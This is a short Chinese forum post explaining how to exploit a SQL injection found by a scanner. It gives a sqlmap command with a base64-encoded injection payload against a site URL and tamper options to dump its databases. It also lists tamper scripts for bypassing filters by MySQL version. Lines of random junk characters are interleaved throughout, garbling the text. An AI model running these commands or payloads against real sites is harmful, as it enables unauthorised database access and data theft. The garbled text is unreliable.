WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
. ] a* i& P6 ~! P! C" c3 }! `3 L. ]: t( y
sqlmap的tamper里有个base64encode.py
6 Z# S; m4 j" K3 a! |8 G4 b: @, X5 t
使用如下
& a+ o! J- K5 a8 G4 h. F, L, |2 H' M
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs* l Z8 O! o7 Z0 t8 J1 i
& q) m8 i0 C7 ?# [, e r9 {8 g
2 U" d+ m$ d# i: g% ~' u2 rsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
; R. c% i" h9 K. n
9 G: t' }8 z% E4 w8 l0 b其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
! \- W% n2 y' h* S1 ~0 U$ _, s# s0 z. ~. s# O
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入+ I( b- G% f4 A; Z" A3 e
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入 C6 P: I+ v% ~: H( A' e
首先确定目标数据库版本,然后选择相应的脚本。4 i* q, Z, J" T7 L
-v 3 --batch --tamper "space2hash.py"2 F2 W/ f$ z; s
9 ^1 g# L5 a1 F* c) c2 j3 y
还有其他一些插件:) l$ C; {, r2 O& k, b4 k7 s
encodes编码 ——charencode.py, \1 {' `# N* R1 h/ h# l$ m0 k
base64编码 —— base64encode.py
7 k8 I& v) E# Y, h, T替换空格和关键字 —— halfversionedmorekeywords.py G* j9 {4 [. ^( g) Q$ k: q
|
; l; q+ y: s/ A5 e0 N, w/ U m" I F0 W( i( e% N
7 S6 V. }1 X- T1 c' R. Z+ I3 r8 ]& ~# u5 l- J$ d [& Y
|